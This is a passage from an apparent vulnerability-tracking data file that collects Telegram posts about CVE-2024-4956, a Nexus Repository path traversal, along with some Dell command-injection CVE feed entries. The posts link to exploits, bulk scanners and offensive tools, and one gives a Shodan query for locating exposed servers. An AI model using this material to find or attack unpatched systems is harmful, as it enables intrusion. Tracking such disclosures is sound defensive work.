\u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 Hashcat \u043d\u0435 \u0443\u043c\u0435\u043b \u0432 Shiro 1, \u0434\u043e \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u043f\u043e\u043a\u0430 Dylan Evans aka fin3ss3g0d \u043d\u0435 \u043d\u0430\u043f\u0438\u0441\u0430\u043b \u0434\u043b\u044f \u043d\u0435\u0433\u043e \u043c\u043e\u0434\u0443\u043b\u044c - mode 12150, \u0430 \u0437\u0430\u043e\u0434\u043d\u043e \u0438 \u0441\u043a\u0440\u0438\u043f\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0439 \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438\ud83d\udc4d\n\n\u2699\ufe0f POC: https://github.com/fin3ss3g0d/CVE-2024-4956\n\ud83d\udd0e Shodan: title:\"Sonatype Nexus Repository\"\n\ud83d\udd0e Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-4956.yaml\n\ud83e\udeb2 \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e: Sonatype Nexus Repository OSS/Pro \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 3.68.1\n\u2705 \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 3.68.1", "creation_timestamp": "2024-06-20T13:05:42.000000Z"}, {"uuid": "a15136cc-fa84-44c6-8fa0-b6070f7f2d88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7394", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 - Nexus &lt; Exploit\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-4956-OoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-23T16:50:34.000000Z"}, {"uuid": "03a61f8c-5a48-468f-ae68-659e8b413777", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7580", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC - CVE-2024\u20134956 - Nexus Repository Manager 3 Unauthenticated Path Traversal\nURL\uff1ahttps://github.com/verylazytech/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-09T12:53:37.000000Z"}, {"uuid": "7e1d4a0e-c2d9-46a5-8f3d-c832803f2b0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7390", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Nuclei Template\nURL\uff1ahttps://github.com/xungzzz/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-23T08:22:01.000000Z"}, {"uuid": "2ab85d80-babf-47af-a768-da0363548e13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7414", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a[CVE-2024-4956] Unauthenticated Path Traversal Bulk Scanner\nURL\uff1ahttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-26T06:54:24.000000Z"}, {"uuid": "a753e5fc-a524-4a42-83e9-55c5d90eb888", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7448", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aProof-Of-Concept (POC) for CVE-2024-4956\nURL\uff1ahttps://github.com/TypicalModMaker/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-29T07:40:24.000000Z"}, {"uuid": "0ffb9644-7709-4988-96c1-31de94002f7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/D3HE0UJzaDXkbj1Vn-7PfkAGqYuP8zCVKwhuLhP2f-Hh7ek", "content": "", "creation_timestamp": "2025-09-10T21:00:04.000000Z"}, {"uuid": "524e9bea-1243-4148-b933-2a28594da9db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/tgq21o80OQlALYIQSpL0-u0-raMvtIm88mJXkULf75Oh7hQ", "content": "", "creation_timestamp": "2025-08-24T23:00:10.000000Z"}, {"uuid": "204ed4c9-8082-4403-8fec-23fc4ea46af8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://t.me/ap_security/573", "content": "#pentest \n\n\ud83e\udded CVE-2024-4956 (Sonatype Repo 3)\n\n\u270f\ufe0f Sonatype Nexus \u2013 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0445\u0440\u0430\u043d\u0438\u0442\u044c \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 Java (Maven), \u043e\u0431\u0440\u0430\u0437\u0430\u043c\u0438 Docker, Python, Ruby, NPM, Bower, RPM-\u043f\u0430\u043a\u0435\u0442\u0430\u043c\u0438, gitlfs, Apt, Go, Nuget, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0441\u0432\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435.\n\n\u2699\ufe0f \u041e\u0431\u0445\u043e\u0434 \u043f\u0443\u0442\u0438 \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 Sonatype Nexus 3 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443, \u043d\u0435 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u043c\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438, \u0447\u0438\u0442\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 3.68.1.", "creation_timestamp": "2024-06-10T08:45:01.000000Z"}, {"uuid": "946b6bee-4285-4d4e-9682-53e8d2e9a2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49565", "type": "seen", "source": "https://t.me/cvedetector/21375", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-49565 - Dell Unity OS Command Injection\", \n  \"Content\": \"CVE ID : CVE-2024-49565 \nPublished : March 28, 2025, 2:15 a.m. | 1\u00a0hour, 51\u00a0minutes ago \nDescription : Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution and Elevation of privileges. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-28T05:12:30.000000Z"}, {"uuid": "2d42e0f5-3d07-4c62-bf64-9601b2210efc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49564", "type": "seen", "source": "https://t.me/cvedetector/21374", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-49564 - Dell Unity OS Command Injection\", \n  \"Content\": \"CVE ID : CVE-2024-49564 \nPublished : March 28, 2025, 2:15 a.m. | 1\u00a0hour, 51\u00a0minutes ago \nDescription : Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges and elevation of privileges. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-28T05:12:29.000000Z"}, {"uuid": "f6975034-12d1-4f61-aaff-2e0aaa4189c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49563", "type": "seen", "source": "https://t.me/cvedetector/21373", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-49563 - Dell Unity OS Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-49563 \nPublished : March 28, 2025, 2:15 a.m. | 1\u00a0hour, 51\u00a0minutes ago \nDescription : Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges and elevation of privileges. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-28T05:12:26.000000Z"}, {"uuid": "5589c7e1-f6a5-4e0f-8afe-854cb218973c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49560", "type": "seen", "source": "https://t.me/cvedetector/10575", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-49560 - Dell SmartFabric OS10 Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-49560 \nPublished : Nov. 12, 2024, 4:15 a.m. | 37\u00a0minutes ago \nDescription : Dell SmartFabric OS10 Software, version(s) 10.5.6.x, 10.5.5.x, 10.5.4.x, 10.5.3.x, contain(s) a command injection vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"12 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-12T06:19:35.000000Z"}, {"uuid": "35243645-0fc9-45e1-98e2-9b7fc8ec8d9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/343", "content": "Exploiting Nexus Repository 3 Directory Traversal Vulnerability (CVE-2024-4956) via Java Fuzzing\n\n\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\ud83d\udcc9\nhttps://exp10it.io/2024/05/%E9%80%9A%E8%BF%87-java-fuzzing-%E6%8C%96%E6%8E%98-nexus-repository-3-%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A%E6%BC%8F%E6%B4%9E-cve-2024-4956/", "creation_timestamp": "2024-05-29T03:53:34.000000Z"}, {"uuid": "2d1383b9-01bb-4b23-a3df-999cccab3ede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/Blackhat_Officials/1030", "content": "CVE-2024-4956 (Sonatype Repo 3) Exploitation Pack\nhttps://ift.tt/wRyUYxV\n\nDiscuss on Reddit : https://ift.tt/RTNCo2i\n@redteamalerts", "creation_timestamp": "2024-06-08T19:44:22.000000Z"}, {"uuid": "e5c6dc3d-66db-4ea5-bd74-9207209ab767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/156", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-06-17T14:01:17.000000Z"}, {"uuid": "ae112688-a0c9-4dcb-ba40-ac305f9af90f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/403", "content": "https://malware.news/t/poc-exploit-for-cve-2024-4956-in-sonatype-nexus-repository-3-draws-threat-actors-attention/82420\n\n\u041e\u043d\u0438 \u0434\u0430\u0436\u0435 \u0431\u043e\u044f\u0442\u0441\u044f \u043d\u0430\u0448\u0438\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0432\u0437\u043b\u043e\u043c\u0430, \u043d\u043e \u043e\u043d\u0438 \u043d\u0435 \u0437\u043d\u0430\u044e\u0442, \u0447\u0442\u043e \u0442\u043e, \u0447\u0442\u043e \u043c\u044b \u043f\u0443\u0431\u043b\u0438\u043a\u0443\u0435\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e, - \u044d\u0442\u043e \u043b\u0438\u0448\u044c \u043c\u0430\u043b\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u043d\u0430\u0448\u0438\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439. \ud83d\ude0e\n\n\nThey are even afraid of our hacking techniques, but they don't know that what we publish publicly is only a small part of our ability. \ud83d\ude0e", "creation_timestamp": "2024-06-04T23:35:26.000000Z"}, {"uuid": "0f64504e-3ffd-4096-b81b-c5003d108e93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/849", "content": "\u200aSoftware Supply Chains Threatened: Nexus Repository CVE-2024-4956 Flaw Exposed\n\nhttps://securityonline.info/software-supply-chains-threatened-nexus-repository-cve-2024-4956-flaw-exposed/", "creation_timestamp": "2024-05-23T19:33:15.000000Z"}, {"uuid": "8ee03237-85e7-4774-98e7-142fdcb4e4a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/AGENTZSECURITY/1253", "content": "https://github.com/toramanemre/log4j-rce-detect-waf-bypass\nhttps://github.com/trickest/log4j\nhttps://github.com/twseptian/custom-nuclei-templates\nhttps://github.com/umityn/my-nuclei-templates\nhttps://github.com/v3l4r10/Nuclei-Templates\nhttps://github.com/valaDevs/env-js-nuclei\nhttps://github.com/valaDevs/nuclei-backupfile-finder\nhttps://github.com/vidocsecurity/templates\nhttps://github.com/vishal12300/all_nuclei_templatess\nhttps://github.com/vsh00t/nuclei-templates\nhttps://github.com/vulnspace/nuclei-templates\nhttps://github.com/wasp76b/nuclei-templates\nhttps://github.com/wearetyomsmnv/llm_integrated_nuclei_templates\nhttps://github.com/websecresearch/nucleirecordloginsession\nhttps://github.com/windyGarlic/my-nuclei-templates\nhttps://github.com/windyGarlic/nuclei-templates\nhttps://github.com/wr00t/templates\nhttps://github.com/xelemental/Nuclei-Templates\nhttps://github.com/xinZa1/template\nhttps://github.com/xjhonly/nuclei-templates\nhttps://github.com/yarovit-developer/nuclei-templates\nhttps://github.com/yavolo/nuclei-templates\nhttps://github.com/z3bd/nuclei-templates\nhttps://github.com/zer0yu/Open-PoC\nhttps://github.com/zinminphyo0/KozinTemplates\nhttps://github.com/zodmagus/z0ds3c-Nuclei-Templates\nhttps://github.com/Christbowel/CVE-2024-25600_Nuclei-Template\nhttps://github.com/0xr2r/templates-nucleir2r\nhttps://github.com/al00000000al/my_nuclei_templates\nhttps://github.com/JohnDoeAnonITA/NucleiTemplatePRV\nhttps://github.com/emo-crab/scap-rs\nhttps://github.com/blackvitasoy/nuclei_templates\nhttps://github.com/BattalFaikAktas/custom-nuclei-templates\nhttps://github.com/0xc4sper0/Nuclei-templates\nhttps://github.com/abletsoff/custom-nuclei-templates\nhttps://github.com/rzizah/private-nuclei-template\nhttps://github.com/0xPugal/my-nuclei-templates\nhttps://github.com/jhonnybonny/nuclei-templates-bitrix\nhttps://github.com/Anja-dhnd/templates4nuclei\nhttps://github.com/andersonmv/Nuclei_Templates\nhttps://github.com/pushpak-11/nuclei-templates\nhttps://github.com/chudamax/custom_nuclei_templates\nhttps://github.com/emadshanab/nuclei-bitrix-templates\nhttps://github.com/Sachinart/manual-nuclei-templates\nhttps://github.com/exploit-io/nuclei-fuzz-templates\nhttps://github.com/hackersupcoming/Nuclei_Templates\nhttps://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561\nhttps://github.com/niranc/Nuclei-personal-templates\nhttps://github.com/Loftven/BIZONE_WAF_DETECt\nhttps://github.com/YashVardhanTrip/nuclei-templates-initial-access\nhttps://github.com/Saitle/Yamilicious\nhttps://github.com/SalehLardhi/nuclei-wp-config-php\nhttps://github.com/c3rrberu5/CVE-2024-24919\nhttps://github.com/0x20c/CVE-2024-4577-nuclei\nhttps://github.com/xungzzz/CVE-2024-4956\nhttps://github.com/ZephrFish/CVE-2024-4577-PHP-RCE\nhttps://github.com/Term1N8/nuclei-templates\nhttps://github.com/KhukuriRimal/CustomNucleiTemplates\nhttps://github.com/stuxctf/nuclei-templates-stux\nhttps://github.com/megamindmeg/Templates\nhttps://github.com/TolgaTD/Nuclei-Custom-Templates\nhttps://github.com/adibarsyad/nuclei-ios\nhttps://github.com/Sysc4ll3r/CVE-2024-4577\nhttps://github.com/adibarsyad/nuclei-jsp-source-code-review\nhttps://github.com/edoardottt/RFDos-Scanner\nhttps://github.com/banditzCyber0x/template\nhttps://github.com/sardine-web/polaris-web-reflected-xss.git\nhttps://github.com/Josekutty-K/nuclei-templates\nhttps://github.com/Mamilate/3-Nuclei-Templates\nhttps://github.com/ReksySec/3Nucleit-Templates\nhttps://github.com/Mohsenalmamun/Nuclei-Template\nhttps://github.com/K3ysTr0K3R/Custom-Nuclei-Templates\nhttps://github.com/br0wnst4n11/Custom_Nuclei_Templates\nhttps://github.com/juanschallibaum/CVE-2024-38473-Nuclei-Template\nhttps://github.com/fa-rrel/Nuclei-templates-xd \nhttps://github.com/superhexa/nuclei-templates\nhttps://github.com/ts4rin4/templates4nuclei\nhttps://github.com/jhonnybonny/nuclei-templates", "creation_timestamp": "2025-04-22T02:52:22.000000Z"}, {"uuid": "a7ac4c04-755c-474e-a728-695a718320dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3250", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the behavior of packed malicious .NET samples. \n\nhttps://github.com/imperva/frida-jit-unpacker\n\nExploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv() \n\nhttps://github.com/ambionics/cnext-exploits?tab=readme-ov-file\n\n\u53bb\u4e2d\u5fc3\u5316\u8fdc\u7a0b\u63a7\u5236\u5de5\u5177\uff08Decentralized Remote Administration Tool\uff09\uff0c\u901a\u8fc7ENS\u5b9e\u73b0\u4e86\u914d\u7f6e\u6587\u4ef6\u5206\u53d1\u7684\u53bb\u4e2d\u5fc3\u5316\uff0c\u901a\u8fc7Telegram\u5b9e\u73b0\u4e86\u670d\u52a1\u7aef\u7684\u53bb\u4e2d\u5fc3\u5316 \n\nhttps://github.com/SpenserCai/DRat\n\nAbusing Windows fork API and OneDrive.exe process to inject the malicious shellcode without allocating new RWX memory region. \n\nhttps://github.com/Offensive-Panda/RWX_MEMEORY_HUNT_AND_INJECTION_DV\n\nCollection of references to write-ups, blog posts and papers related to cybersecurity, reverse engineering and exploitation (constantly updated)\n\nhttps://github.com/0xor0ne/awesome-list/blob/main/topics/cybersec.md\n\nGitHub - yoryio/CVE-2024-20767: Exploit for CVE-2024-20767 - Adobe ColdFusion\n\nhttps://github.com/yoryio/CVE-2024-20767\n\nGitHub - TracecatHQ/tracecat: \ud83d\ude3c The open source alternative to Tines / Splunk SOAR. Build AI-assisted workflows, orchestrate alerts, and close cases fast.\n\nhttps://github.com/TracecatHQ/tracecat\n\nGitHub - sarperavci/CloudflareBypassForScraping: A cloudflare verification bypass script for webscraping\n\nhttps://github.com/sarperavci/CloudflareBypassForScraping\n\n#HackersFactory", "creation_timestamp": "2024-05-28T10:06:24.000000Z"}, {"uuid": "03ed6143-6f49-4072-8de1-cd55e9a29446", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/6GnqD5t4jjFrRtr1HdioC3NHJPJJ6vXIl9yDebqxFDllabs", "content": "", "creation_timestamp": "2024-08-22T10:54:42.000000Z"}, {"uuid": "0caf6d5d-47c3-4d59-b1ea-6b3be161c72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/u4QW-PhXvOdEz-DPSjg467lSb3twIBu6R_ivSGfCYMMnQBw", "content": "", "creation_timestamp": "2025-03-26T22:00:05.000000Z"}, {"uuid": "1811b703-ec17-46ec-86ff-75beebf7f7b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/vQ0Sm3TCgGLw115KTy13Xlz5wNa50qfz0GIGSnr52V26EMk", "content": "", "creation_timestamp": "2025-03-26T20:00:07.000000Z"}, {"uuid": "955f388d-a2b9-4367-90a1-f0a3c23f9bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7825", "content": "Tools - Hackers Factory\n\nAn incredibly fast proxy checker &amp; IP rotator with ease. \n\nhttps://github.com/kitabisa/mubeng\n\n[CVE-2024-4956] Nexus Repository Manager 3 Unauthenticated Path Traversal Bulk Scanner \n\nhttps://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner/\n\nRepository to house markdown templates for researchers \n\nhttps://github.com/bugcrowd/templates\n\nPython for AWAE (Advanced Web Attacks and Exploitation) \n\nhttps://github.com/shreyaschavhan/python-for-awae\n\nA tool for collecting RDP, web and VNC screenshots all in one place \n\nhttps://github.com/nccgroup/scrying\n\nJeeves SQLI Finder \n\nhttps://github.com/ferreiraklet/Jeeves\n\nThe Frida-Jit-unPacker aims at helping researchers and analysts understand the 